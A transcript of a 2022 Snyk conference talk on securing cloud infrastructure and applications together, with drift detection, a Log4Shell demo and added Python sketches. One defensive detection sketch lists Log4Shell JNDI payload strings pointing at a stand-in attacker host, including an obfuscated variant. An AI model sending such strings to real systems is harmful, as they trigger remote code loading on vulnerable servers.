Protecting Apps from Code to Cloud, and Back to Code

Europe 2022

Senior Director - Product Marketing · Snyk

Cloud and DevOps practices blur the boundary between application development and the production cloud environment. Solutions that satisfy the needs of only the development team -or- the security & operations teams, in isolation, don't help where organizations need it the most: reducing security risk while ALSO increasing the speed of application delivery.

In this session, we'll share how security teams are scaling by empowering developers to create secure applications, including the use of modern cloud technologies that are used to deploy and run application workloads. We'll show you how you can give developers a unique security feedback loop, with direct, actionable fixes, from code to cloud, back to code. By connecting observed cloud security insights with developer-driven workflows, developers can prioritize and remediate vulnerabilities faster in cloud native workflows. This results in reduced risk due to more secure cloud environments and increased developer productivity, leading to better and faster innovation.

Full transcript

The complete talk, organized by section.

Jim Armstrong

Hi everyone, and thank you for joining me today in this session about protecting your apps from code to cloud and back to code. My name is Jim Armstrong. I'm a senior director of product marketing at Snyk, and today I want to walk you through a bit of the problem space here that we see and how we can improve the security of our applications and the cloud at the same time.

It wasn't that long ago that a full-stack developer was somebody who could develop the front end of the application, the UI, and those kinds of things, as well as the back end of the application. I think now, with the introduction of cloud becoming more and more prominent, that also might include the actual technology stack as part of the full-stack development, meaning that they develop all of that code for an application but can actually develop all of the cloud infrastructure and cloud deployments as part of that as well. Now, whether that's a single person or not is a matter of resources and expertise in individual companies. Certainly, in a lot of companies, it's different.

But the cloud does start from code, and so the issue of how we fix cloud problems becomes more and more of a code issue, of an engineering issue, something that can fortunately be fixed much earlier in its life cycle instead of waiting for the cloud itself to be deployed. But of course, the cloud is there in service of the applications. Those two things go hand in hand, so splitting them apart doesn't really make a lot of sense.

Unfortunately, that tends to be something that we see on a fairly frequent basis, where there is a plan and perhaps some tools and a process for code security that's focused on the developers and a plan and maybe some tools and processes around cloud security to protect the infrastructure and the running environment. But a lot of times, those two things are disconnected from each other, when again, in reality, what we want is to have all of this flow together.

The idea of DevOps is that we can produce these applications quickly and deploy them quickly, and that means both the cloud and the app configurations and code all need to go together. They need to be tested together. They need to have pipelines that at some point come together to produce the application as it runs in the cloud. And all of that needs to be secured early and often in its life cycle as well. One of the advantages at least of developing the cloud that way, using infrastructure as code, is to have that early source of truth so that it can actually be tested.

Now, the other prickly point here, the other hidden issue, although probably for most of you listening today this is not such a hidden issue, is the fact that the developers far outnumber security folks. So one of the other reasons why shift left has become such an important concept is that we want to move that responsibility to the left, not just the testing itself, although getting earlier visibility into security results is certainly nice. But we actually want to shift that responsibility.

There are nowhere near enough security experts to be able to handle all of the security alerts and events that might come out of the code for the application or the code for the cloud configurations, for that matter. And so it's very much on the developers, or you could swap out the word developer for cloud engineer, to be able to quickly identify issues and be able to quickly fix those issues. That's the other really important aspect of this, because that's how we're going to scale security, by getting those developers involved.

Again, when it comes to applications and application code, there are fairly well-known and fairly well deployed patterns for making this happen. We have the code, and we test it in our developer's IDE. We test it again when it's in the code repos. We test it as it goes through pipelines. If there are artifacts that are created, they can be tested wherever they are stored. And then finally, we can test our apps as they are running in the cloud. Again, none of that is new to the world of applications.

However, we don't always treat our cloud that way. In fact, a lot of times with the cloud, we start at the other end. We start at the cloud, and we look at what's deployed there, and we've got to make that connection back to code. That's really, really important.

Now, we're seeing more and more coverage that goes from code to cloud, meaning we can check things in both places. We can check for the cloud. We can check the infrastructure as code. We can check our Terraform configurations, or we can check a container, even a Dockerfile, early in its life cycle. And then we also look at what's deployed, and so we identify issues across the life cycle. But really, we want to link issues across this entire life cycle.

The great thing about having all of this in code, your container configurations and your infrastructure as code configurations, Kubernetes, all that kind of stuff, is we can identify those issues early in the life cycle. And then, of course, we want to link those things to the cloud, because how do you fix problems that you identify in the cloud? You have to come back to the code and fix them just the same way you do with your application issues. So if you're only doing one or the other, or if they're not linked to each other, you're not linking your cloud resources to the IaC that creates them or the containers that are being created there, then it's going to be very hard to fix the actual issues themselves. It's a lot of manual work to go backwards that way.

So really what we want is to have this code-to-cloud coverage, but we also want to go from the cloud back to code. And what that really means is a couple of things. One, we want to have a single policy engine. So if we start at the code side, which is the appropriate place to start, let's catch the problems before we deploy anything. We want to have a policy engine there. We want to be able to define our policy in code as well, so that we can check everything that's about to be deployed. But we also want to use that same policy engine with what is deployed, with the things that are actually running in our cloud environment. We want to apply the same checks in both places throughout the life cycle of those resources that we're defining and deploying. This is critically important: if we're defining two different sets of policies, obviously we're going to get two different sets of results, and then we're going to have to do all the work again to match those things back up. So that single policy engine is really important. Now, again, that's part of the code-to-cloud story.
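The single-policy-engine idea can be sketched in a few lines. This is a minimal illustration, not how Snyk or any particular product implements it: the normalized resource shape, the two policies, and the `evaluate` function are all hypothetical. The point is only that one rule set runs unchanged over resources parsed from IaC and over resources observed in the cloud, so the two sets of findings are directly comparable.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List

# Hypothetical normalized shape shared by IaC-derived and cloud-derived resources.
Resource = Dict[str, object]


@dataclass(frozen=True)
class Policy:
    policy_id: str
    description: str
    violates: Callable[[Resource], bool]


# Hypothetical example policies; a real rule set would be much larger.
POLICIES: List[Policy] = [
    Policy(
        "no-public-bucket",
        "Storage buckets must not be publicly readable",
        lambda r: r.get("type") == "bucket" and r.get("public") is True,
    ),
    Policy(
        "no-open-ssh",
        "Firewall rules must not expose port 22 to 0.0.0.0/0",
        lambda r: r.get("type") == "firewall"
        and 22 in r.get("ports", [])
        and "0.0.0.0/0" in r.get("sources", []),
    ),
]


def evaluate(resources: List[Resource], stage: str) -> List[dict]:
    """Run the one shared policy set over resources from any life cycle stage."""
    findings = []
    for resource in resources:
        for policy in POLICIES:
            if policy.violates(resource):
                findings.append(
                    {"stage": stage, "resource": resource["id"], "policy": policy.policy_id}
                )
    return findings


# What the IaC says should exist.
iac_resources = [
    {"id": "bucket.logs", "type": "bucket", "public": False},
    {"id": "fw.ssh", "type": "firewall", "ports": [22], "sources": ["10.0.0.0/8"]},
]
# What is actually running; the bucket was made public after deployment.
cloud_resources = [
    {"id": "bucket.logs", "type": "bucket", "public": True},
    {"id": "fw.ssh", "type": "firewall", "ports": [22], "sources": ["10.0.0.0/8"]},
]

iac_findings = evaluate(iac_resources, "iac")
cloud_findings = evaluate(cloud_resources, "cloud")
print(iac_findings)
print(cloud_findings)
```

Because both stages share policy IDs and resource IDs, a finding that appears only in the cloud results points straight at the IaC definition that needs attention.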

But then we want to go back to code. What does that mean in terms of infrastructure as code, in terms of containers, in terms of these cloud-native technologies? Well, it means things like finding resources that have drifted from their original definition. So we defined it in IaC, we deployed it, now something has changed in the cloud. You can think of all kinds of examples and reasons why that might happen. Some of them are well known and actually good. We have burstable resources, and so we've expanded our resource pool in the cloud due to a traffic spike or something, and so we have drift there. We have more resources than what we may have originally defined in our IaC. And then that may come back down, and so that may be some kind of drift.

But we may also have people that come in and they need to open a port. We need to copy a file over, so we go into our AWS console, and we manually open a port, and then we forget to close it. Well, that's drift as well. We've left a port open. We didn't intend to do that, and it wasn't malicious, but certainly it's something that we need to get back into its desired, its intended state. And of course, there is potentially malicious drift. Think about finding unmanaged resources. What if somebody does get access to your environment and they spin up a few new S3 buckets so they can store some confidential data, or they spin up some new resources in the cloud to run a Bitcoin miner, for instance? All kinds of weird things like that could potentially happen. Those are all unmanaged resources. Those are things that aren't even defined in your IaC definition, but you want to be able to detect those in the cloud, and you want to be able to relate that back and say, "These are things that weren't supposed to be deployed, and now they are." So that's one example of going from the code to the cloud and then going from the cloud back to the code so that we can fix those issues.
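The three kinds of drift described here (a resource that changed, a resource defined in IaC that is no longer in the cloud, and a resource in the cloud that IaC never defined) reduce to set comparisons once both sides are keyed by a resource ID. The sketch below assumes that both the intended and actual state are already available as dictionaries; the resource names and attributes are made up for illustration, and real drift tools also have to filter out expected differences such as autoscaling.

```python
from typing import Dict, List

Resources = Dict[str, dict]  # resource id -> attributes (hypothetical shape)


def classify_drift(intended: Resources, actual: Resources) -> Dict[str, List[str]]:
    """Compare the IaC-defined state with the observed cloud state."""
    changed = sorted(
        rid for rid in intended.keys() & actual.keys() if intended[rid] != actual[rid]
    )
    missing = sorted(intended.keys() - actual.keys())    # in IaC, not in the cloud
    unmanaged = sorted(actual.keys() - intended.keys())  # in the cloud, not in IaC
    return {"changed": changed, "missing": missing, "unmanaged": unmanaged}


intended = {
    "firewall.web": {"ports": [443]},
    "node.a": {"machine_type": "e2-medium"},
    "bucket.assets": {"public": False},
}
actual = {
    "firewall.web": {"ports": [443, 8080]},  # a port opened by hand and never closed
    "bucket.assets": {"public": False},
    "bucket.unknown": {"public": True},      # never defined in IaC
}

drift = classify_drift(intended, actual)
print(drift)
```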

Also, think about using the cloud and what's running there to prioritize what needs to be fixed in that developer's interface. We've deployed an application. Let's use Log4Shell as an example of a vulnerability. So we can identify the fact that in our deployed application, it was deployed before Log4Shell was a thing. And now we find that we have in the cloud an application that has the Log4Shell vulnerability. Well, now we need to get back and fix it.

Really, two things need to happen. On the cloud side, we want to shut down access to it or do whatever we can to sort of mitigate the problem. But then ultimately, we have to feed the information back to a developer that says, "It's this app and it's this line in your app that needs to be fixed." And that's the important power of this back-to-code side, from the cloud back to code. Not just being able to say that there's a problem here, but there's a problem here, and here's the line of code that you need to go to, to fix it.

So we're actually going to do a demo. We're going to take a look at both of those types of examples. We're going to look at managing drift, detecting drift, and within your infrastructure as code, going from the code to cloud and then back to code. And we'll also take a look at this Log4Shell vulnerability. But this is really powerful. This is the kind of thing that we want to see, and we want to, again, have this full life cycle. Remember, the DevOps loop is a loop. It goes around and around and around, and that's really what we want in our applications.

But more than that, that's just the cloud-native technology. Really what we want to get to, and this is where Snyk's longer term vision lies, is we want to also prioritize all the application vulnerabilities. Again, the cloud is the place where the applications are running. Our code and our cloud configurations are all starting from the developer's desktop, from an engineer's desktop. Eventually, those things become a cohesive unit. It becomes our application. It becomes our workloads that are running in the cloud, and those two things go hand in hand.

We want to be able to use that cloud context to say, "This is the application that has Log4Shell," or, "This application has a cross-site scripting vulnerability in the code." We want to identify that before the bad actors get the chance to identify that. And we want to go back into the code and say, "This is the line of code that needs to be fixed. Here's how this cross-site scripting weakness was introduced, this cross-site scripting defect was introduced into your first-party code, and here's how you can fix it, and then you can redeploy it and get rid of it." And we can use the cloud context to do that.

We could use the cloud context as well to say, "Yes, we've got a cross-site scripting vulnerability. However, this is not a public-facing cloud application." And we know that because of how it's deployed in the cloud and because of the graph of resources that are there in the cloud telling us this is not a live and active vulnerability. So that's a really important bit as well. All the data for that exists in Snyk. We haven't quite put all the pieces together yet, but that's the direction that we want to head.
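As a rough sketch of using cloud context for prioritization: assume each finding names the application it belongs to, and assume the cloud side can say whether that application is public-facing. Both inputs, the `Finding` type, and the ranking rule are hypothetical; the talk describes this as a direction rather than a finished feature. Exposed applications sort first, then severity breaks ties.

```python
from dataclasses import dataclass
from typing import Dict, List

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


@dataclass(frozen=True)
class Finding:
    app: str
    issue: str
    severity: str


def prioritize(findings: List[Finding], public_facing: Dict[str, bool]) -> List[Finding]:
    """Rank findings: publicly exposed apps first, then by severity."""

    def sort_key(finding: Finding):
        # If exposure is unknown, assume the app is exposed (the cautious default).
        exposed = public_facing.get(finding.app, True)
        return (exposed, SEVERITY_RANK[finding.severity])

    return sorted(findings, key=sort_key, reverse=True)


findings = [
    Finding("internal-reports", "cross-site scripting", "high"),
    Finding("storefront", "cross-site scripting", "medium"),
    Finding("storefront", "Log4Shell", "critical"),
]
# Hypothetical exposure data derived from how each app is deployed in the cloud.
public_facing = {"internal-reports": False, "storefront": True}

ranked = prioritize(findings, public_facing)
for finding in ranked:
    print(finding.app, finding.issue, finding.severity)
```

Here the medium-severity issue in the public storefront outranks the high-severity one in the internal app, which is the kind of reordering that cloud context makes possible.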

Okay, so as I mentioned, we're going to take a look at a couple of demos. So let's take a look first at this idea of managing the cloud and cloud drift and doing that from code to cloud and back to code. So we talked about this scenario before where your infrastructure as code is a form of cloud. In this scenario, we're going to look at Terraform deploying to Google Cloud. We've set up a Kubernetes cluster, a GKE cluster in Google Cloud, and so we're going to manage that with IaC.

Now, what you can see here first is the actual IaC project itself. We've got all of our standard Terraform configuration modules in here. A lot of this is derived from that Google deployment. And so you can see it's just standard Terraform. Nothing terribly special about it. We've scanned it because it is code, so we've done all of our checks here early in the development life cycle. We could do this in the IDE. This happens to be the Snyk interface where we can see issues have been identified. We've got enough detail about the issues that we could go back into that code and we could correct these misconfigurations, if you will, to make them more secure. Fairly straightforward type of fixes there. You can see that we've got some of the code shown here as well.

Okay, so that's how we start this whole process, right? And again, that's sort of the idea of code to cloud. We've got our code here. We could scan this in our Git repos, which is in fact what we've done in this example, imported those Git repos. We could scan through a CI process and scan the Terraform plans as well. And then, of course, we want to look at what's actually deployed in the cloud and match that up with what's intended to be in our IaC.

So let's take a look at how that might look. Now, exactly what we're doing here, we've already scanned the IaC. We saw that for the configuration issues. What we're doing here is looking for the drift, the drift that exists between the intended state in IaC and what actually exists in our Google Cloud. So here you can see we've got a list of those things. We've got changed, missing, and unmanaged resources. You can see our IaC covers about 70% of the resources in the cloud and several things have been changed or missing.

So we look at our changed resources, and you'll notice that we've got an instance that has changed. And I know from my own knowledge of this cluster that's changed because the cluster scaled up. We added a new node when that happened, and then it scaled back down and one of the original nodes that was there was the one that was scaled away. And actually, if we look at the missing resources here, we can see that old instance listed there as well.

Now we also have unmanaged resources. Unmanaged resources are resources that are not in my IaC yet. Now, in this case, maybe those are all fine and those have been manually set up over time via some other process and I eventually want to get them into IaC. Or maybe they're dangerous resources or something else. But also disconcerting here is I've got this new port open in my configuration. That's something that I had not put into IaC. This looks like some sort of development port for an application, but it could be any number of things. And so it's definitely worth investigating to see why that port has been opened and either to decide whether that needs to be in IaC or it needs to be removed from the cloud. So imagine somebody opened this port to do some testing and forgot to close it. And of course, that could be a security concern as well. So that's an example of going from the code, IaC, to the cloud and then going from the cloud back to our code to get all these resources managed and configured properly.

Okay, so now let's take a look at a second example. This one's pretty interesting as well. So this is Log4Shell. Now Log4Shell in and of itself, I think most of you are fairly familiar with, unfortunately. But it is an interesting example to dive into for a whole number of reasons, and it's one of those vulnerabilities that's easy, relatively speaking, to detect when it's running in your cloud environment. It can be relatively hard to fix it, though, because a lot of times what you find in the cloud environment is a detection for something like Log4Shell, but not enough details in terms of what a developer needs to fix it.

So let's think about that for a second. What does a developer need to fix these types of vulnerabilities? We have something like Log4Shell. What does it take if we want to flip that over? If we want to shift this left and have a developer handle this issue on their own, what do we need to give them that's different from what we might see from just a cloud security tool? So our cloud security tools are going to do some incredible things. Now, my argument is not that you don't need cloud security tools. I don't want people to walk away from this session thinking that that's what I'm trying to get across. I do think you need cloud security tools. This specific case is a great reason and a great case in point. If you have Log4Shell running in your environment, you do need to mitigate that risk while a developer goes and fixes something. So there is a time gap there. You also need to know where it's running, and there is important detail that comes from the cloud security tools. What cluster, what environment is this in? How often do you have it? What are the actual containers and services? All of those are important details about this incident.

But what does a developer need aside from that information to actually go and fix the root cause issue? Well, for something like Log4Shell, they need to know what line of code introduced this vulnerability, and they need to know how to change it and what to change that line of code to in order to get rid of the vulnerability. And that can be particularly challenging. Think about something like Log4Shell. It's not just a vulnerability in a package that they know about. Log4j in many, many cases is actually a transitive dependency. It's a dependency of some other dependency that a developer adds to their code. And so you can't necessarily just go and search for Log4j in your package manifests, because it might be a dependency of a dependency, and therefore you have to know the root cause. What introduced Log4j? And so what do you change in that thing that you added so that it gets rid of this vulnerable version of Log4j? So it becomes a much more complex problem. And remember, it may not happen just once. You may have multiple packages that have multiple links to Log4j in a single application. It's a pretty challenging problem.
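To make the transitive-dependency problem concrete, here is a small sketch that walks a dependency graph and lists every path from the application to the vulnerable package. The graph is invented for illustration (only `log4j-core` is a real artifact name), and real tools resolve this from the build system rather than a hand-written dictionary. The second element of each path is the direct dependency the developer actually declared, which is the thing they would need to change.

```python
from typing import Dict, List

DependencyGraph = Dict[str, List[str]]  # package -> packages it depends on


def paths_to(graph: DependencyGraph, root: str, target: str) -> List[List[str]]:
    """Return every dependency path from root to target (depth-first)."""
    paths: List[List[str]] = []

    def walk(node: str, trail: List[str]) -> None:
        trail = trail + [node]
        if node == target:
            paths.append(trail)
            return
        for child in graph.get(node, []):
            if child not in trail:  # guard against dependency cycles
                walk(child, trail)

    walk(root, [])
    return paths


# Hypothetical dependency graph for a small Java to-do application.
graph = {
    "todo-app": ["web-framework", "search-client"],
    "web-framework": ["logging-starter"],
    "logging-starter": ["log4j-core"],
    "search-client": ["log4j-core"],
}

paths = paths_to(graph, "todo-app", "log4j-core")
direct_culprits = sorted({path[1] for path in paths if len(path) > 1})

for path in paths:
    print(" -> ".join(path))
print("direct dependencies to change:", direct_culprits)
```

Note that `log4j-core` never appears in the application's own dependency list here, yet it arrives by two separate routes, so fixing only one direct dependency would leave the vulnerable package in place.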

And so without the right tools, developers and security are going to spend a lot of time analyzing code and trying to figure out how to get there. What's a more direct path is to use that information from the cloud to quickly identify the right sort of application to get to, and to have your application security tell you exactly what line of code needs to change, and what it needs to change to, to get rid of Log4Shell, or even to make the change for you by opening a pull request so that you can do that and make that change directly. So, this is the type of thing that changes, I think, when you start to think about how a developer is going to handle these issues. It's not enough to merely identify the issue running in the environment, but we have to think about how a developer is going to take care of it.

So again, let's take a look at what that might look like in an environment. Okay, so what we're running here is a Java application. This is just a simple little to-do list application that's meant to kind of show off Java, but it does happen to be using a vulnerable version of Log4j, which allows us to put this handy little URL into our box. And when we search for that, it will actually send the command over to a server, which sends the command back to our app, and basically defaces our app. So it changes our app code.

Now, in this environment, we have Sysdig running. And so you can see that I've got several things running in the environment, and we can detect some problems here. You'll notice that I've got a rule set up for Log4Shell, and specifically in this case, we're looking for that bad traffic. And what you can see here is we've actually captured the command. So this is what the bad server does. When we entered that URL, it sent that request off. That's what Log4j, the Log4Shell vulnerability allows you to do. Put in a bad request like that, it gets logged, the log gets picked up. It just blindly follows a URL, which bounces back and sends this command. So anyway, that's the command. And it went into the containerized application, the Java app, and added this code.
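For readers who have not seen one, a Log4Shell request carries a JNDI lookup string such as `${jndi:ldap://host/path}`, which a vulnerable Log4j version resolves when the string gets logged. The sketch below is a deliberately naive pattern check for that shape in an input string. It is not how the Sysdig rule in the demo works, and it is not sufficient as a defense, since obfuscated lookups slip past a simple pattern; the function name and the sample strings are made up.

```python
import re

# Naive pattern for a plain JNDI lookup; obfuscated variants will not match.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://[^}]*\}", re.IGNORECASE)


def looks_like_jndi_lookup(text: str) -> bool:
    """Return True if the text contains an unobfuscated JNDI lookup string."""
    return JNDI_LOOKUP.search(text) is not None


samples = [
    "buy milk",
    "${jndi:ldap://attacker.example/a}",
    "${JNDI:LDAP://attacker.example/a}",
    "${${lower:j}ndi:ldap://attacker.example/a}",  # obfuscated, evades this check
]

for sample in samples:
    print(looks_like_jndi_lookup(sample), sample)
```

The last sample shows why input filtering alone is not a fix: the root cause is the vulnerable library version, which is what the rest of the demo addresses.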

So we've detected it running with Sysdig here, and we could set up policies to help block that if we wanted to. In this case, we haven't. We've detected it. Now we need to fix the root cause of that Log4Shell vulnerability. And so to fix that root cause, we're going to come over to Snyk. So Snyk and Sysdig are integrated. You can see here Snyk has identified a number of issues, both in the application code itself and in the container that's running this application. With our Sysdig integration, we're getting executed package information sent over. You can see here we've detected the Log4j package with the Log4Shell vulnerability running in this environment. You can actually see the little executed flag here, where Sysdig is telling us that this particular package was executed. We can see it in the app in this case, and some details about it that tell us a bit about how to go and fix it. But we can do even more with Snyk.

So we've got it here in a containerized application, which is running our Java, but we also have the code itself. And we can use Snyk to identify exactly where to go into that code, and fix this application. So let's take a look at this. It's a package manifest, obviously. It's something that was introduced via Java packages. And in this case, again, we have that vulnerability there, and we have the details. It tells us how to fix it. But we can do more. We can, instead of just telling a developer what line to fix, we can actually give them the code to fix it. So we can actually open a pull request that will allow us to fix this vulnerability.

And you can see here when I click on that button, I've got the vulnerability actually selected here. There are bunches of other vulnerabilities in this app. This is an intentionally broken app, so there are tons of things wrong here that we could potentially fix with pull requests. We're going to just focus on those two. So let's take a look there. What does that do for us? Well, it's a pull request, so obviously it's got to make a code change, and in this case, it's a Java application, so we're going to go to our manifest there and make the changes. Here's what the pull request looks like. Pretty standard stuff, but it tells us all the things that are being fixed by this pull request, ranked in terms of importance. We've only selected two here. We can actually take a look at what it's doing by looking at the code itself for what's been included. Now, before we do that, note that when we open this pull request, we actually run checks against it to make sure we're not introducing any new issues with these changes. And then we can take a look at the actual code change here as well.

And again, the details here are fun to look at, but the important part is this makes a developer's life easier. We've given them the code itself in a pull request. We've helped them understand the issue. We've helped them get straight to the issue to fix it. That's a lot of work that would have to be done manually if you just identify the vulnerability in the cloud and you have things like the cluster. But if you have the access to the cloud and you have the access to the application and the code that's in there, this is how you can get straight to those fixes very quickly and very easily.

Okay, so that will pretty much wrap things up for me. Again, I think the important point here to drive home, whether you use Snyk or not, is that we need to look at the cloud and we need to look at our applications as a cohesive unit, because they really are. It may be different engineering teams, but the whole idea of DevOps at its heart is that these teams are working together to get apps deployed and to get apps managed and secured as quickly and as easily as possible so that we can have this rapid iteration, we can innovate much faster.

And so our tools should match that process as well. Our tools should link our cloud and our code together. Our tools should treat the code and the cloud as if they are part of the same application, as if they are part of the same stack, so that we can get to the root of issues much faster and fix them. And so that we manage our cloud the way that we manage our applications, because most of the cloud, in and of itself, aside from the app, is just code. They can be managed the way that we've managed applications for years now. By doing this, I think we can bring developers, cloud teams, security teams all together much closer, and we can secure our apps, and we can secure our cloud from the code to the cloud, and of course, going back to the code as we continue to iterate and make things better.

So I hope that was informative. I hope it was useful. Again, my name is Jim Armstrong. I would love to chat with any of you. If you want to, you can find me on Twitter at J-D-A-R-M-S-T-R-O, and I would love to hear from you. But I hope you enjoy the rest of the show. Have a great day, and thanks again.